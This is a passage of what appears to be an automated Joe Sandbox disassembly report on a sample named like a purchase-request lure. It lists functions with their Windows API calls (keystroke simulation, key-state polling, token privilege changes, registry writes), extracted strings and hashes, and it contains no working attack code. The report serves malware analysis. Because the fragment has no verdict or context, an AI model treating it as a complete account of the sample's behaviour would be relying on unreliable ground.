                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                • SendMessageW.USER32 ref: 0048CFD1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                • SendMessageW.USER32 ref: 0048D03D
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                • GetParent.USER32(?), ref: 0048D0BA
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                • SendMessageW.USER32 ref: 0048D154
                                                                                • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                • SendMessageW.USER32 ref: 0048D22F
                                                                                • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: %$@GUI_DRAGID$F
                                                                                • API String ID: 3977979337-880513241
                                                                                • Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                • Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$_memset
                                                                                • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                • API String ID: 1357608183-1426331590
                                                                                • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                • IsIconic.USER32(?), ref: 0043D66E
                                                                                • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                APIs
                                                                                  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                • _memset.LIBCMT ref: 00458353
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                  • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                  • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                • String ID: $default$winsta0
                                                                                • API String ID: 2063423040-1027155976
                                                                                • Opcode ID: 7be1ac5be2e4501a0d8ea70d1a0710a767c1e66cdcb6221c91b9d2c38c59048b
                                                                                • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                • Opcode Fuzzy Hash: 7be1ac5be2e4501a0d8ea70d1a0710a767c1e66cdcb6221c91b9d2c38c59048b
                                                                                • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                • __swprintf.LIBCMT ref: 0046C890
                                                                                • __swprintf.LIBCMT ref: 0046C8D3
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • __swprintf.LIBCMT ref: 0046C927
                                                                                  • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                • __swprintf.LIBCMT ref: 0046C975
                                                                                  • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                  • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                • __swprintf.LIBCMT ref: 0046C9C4
                                                                                • __swprintf.LIBCMT ref: 0046CA13
                                                                                • __swprintf.LIBCMT ref: 0046CA62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 3953360268-2428617273
                                                                                • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                                                                • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                • _wcscmp.LIBCMT ref: 0046F074
                                                                                • _wcscmp.LIBCMT ref: 0046F08B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: 83b45bc4bd5ffc8e8bad3d2a440ddb61cfa45c9d9296baa340c0b09b397d7d55
                                                                                • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                • Opcode Fuzzy Hash: 83b45bc4bd5ffc8e8bad3d2a440ddb61cfa45c9d9296baa340c0b09b397d7d55
                                                                                • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                • API String ID: 0-559809668
                                                                                • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                                                                • _wcscmp.LIBCMT ref: 0046F128
                                                                                • _wcscmp.LIBCMT ref: 0046F13F
                                                                                  • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                • __swprintf.LIBCMT ref: 0046A231
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                • _memset.LIBCMT ref: 0046A2B2
                                                                                • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 2733774712-3457252023
                                                                                • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00460097
                                                                                • SetKeyboardState.USER32(?), ref: 00460102
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                APIs
                                                                                  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
